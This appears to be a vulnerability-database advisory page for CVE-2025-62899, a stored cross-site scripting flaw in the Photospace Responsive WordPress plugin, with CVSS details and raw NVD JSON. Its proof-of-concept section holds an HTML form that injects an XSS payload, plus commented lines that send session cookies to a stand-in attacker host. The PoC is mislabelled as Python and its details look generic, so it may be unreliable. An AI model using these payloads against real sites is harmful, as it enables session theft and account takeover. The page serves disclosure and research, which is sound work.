Security Vulnerability Report
中文
CVE-2025-62899 CVSS 5.9 MEDIUM

CVE-2025-62899

Published: 2025-10-27 02:15:49
Last Modified: 2026-04-27 18:16:29

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in THRIVE - Web Design Gold Coast Photospace Responsive photospace-responsive allows Stored XSS.This issue affects Photospace Responsive: from n/a through <= 2.2.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Photospace Responsive <= 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62899 PoC: Stored XSS in Photospace Responsive --> <html> <body> <form action="http://target-site/wp-admin/admin.php?page=photospace-responsive" method="POST" enctype="multipart/form-data"> <input type="hidden" name="title" value="Malicious Gallery"> <input type="hidden" name="description" value='<img src=x onerror="alert(String.fromCharCode(88,83,83,32,80,111,67))">'> <input type="hidden" name="action" value="save"> <input type="submit" value="Exploit"> </form> <script> // Steal cookies/session // document.location='http://attacker.com/steal?c='+document.cookie // // Payload: <script>fetch('http://attacker.com/log?c='+document.cookie)</script> // Or: <img src=x onerror="fetch('http://attacker.com/log?c='+btoa(document.cookie))"> </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62899", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:49.060", "lastModified": "2026-04-27T18:16:28.537", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in THRIVE - Web Design Gold Coast Photospace Responsive photospace-responsive allows Stored XSS.This issue affects Photospace Responsive: from n/a through <= 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/photospace-responsive/vulnerability/wordpress-photospace-responsive-plugin-2-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}